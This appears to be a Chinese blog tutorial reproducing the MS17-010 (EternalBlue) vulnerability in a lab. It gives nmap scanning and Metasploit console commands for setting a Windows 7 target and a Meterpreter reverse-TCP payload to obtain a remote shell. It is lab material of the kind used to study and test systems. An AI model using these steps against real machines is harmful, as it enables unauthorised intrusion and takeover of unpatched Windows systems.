admin 管理员组

文章数量: 887021

漏洞复现:MS17-010

漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口)

                             2.关闭防火墙

靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9

攻击机:kali linux (X64) ip:192.168.1.101

使用工具:meatsploit,nmap

前期准备工作:由于kali是64位,如果windows 7 是32 位,所以我们得安装wine32环境,并且下载32位操作系统的永恒之蓝漏洞利用脚本。可参考文章后面大佬的博客,也可阅读本文。如果是X64位操作系统则不用安装。

第一部分:主机发现(nmap)

打开nmap进行主机发现,可以扫描到主机的IP地址,端口号,服务器的版本等其他信息

Nmap -A 192.168.1.0/24

发现靶机开放445端口,那么我们就可以利用该端口进行渗透

第二部分:metasploit工具进行漏洞利用

1.启动该工具

msfconsole

2. 查找永恒之蓝漏洞利用脚本

search ms17-010

可以看到有这样几种攻击脚本 (第四个脚本文章会详细说明如何安装),exploit开头的是漏洞利用模块,可以用来进行攻击;auxiliary是漏洞辅助模块,可以查询漏洞的详细信息等。

3.我们先用auxiliary是漏洞辅助模块,查询漏洞的详细信息,如下图所示

use 3   #使用该模块

show options   #显示需要设置的参数

set rhosts 192.168.1.9   #设置靶机的IP地址

 4.查看漏洞利用payload

show payloads

 5.设置攻击用到的payloads

set payloads windows/x64/meterpreter/reverse_tcp  #设置payloads

run  #开始进行漏洞利用攻击(输入exploit也可以反弹出交互式shell)

 可以看到提示信息,该主机可能存在这个漏洞

6.接下来我们使用exploit模块(步骤同上,原理同上)------如果未知靶机是多少位的操作系统,我们先用常规的用来测试X64位操作系统

search ms17-010   #查询漏洞利用脚本

use 0   

set payloads windows/x64/meterpreter/reverse_tcp

show options

本文标签: 漏洞 Windows

版权声明:本文标题:MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1727509259h1126954.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。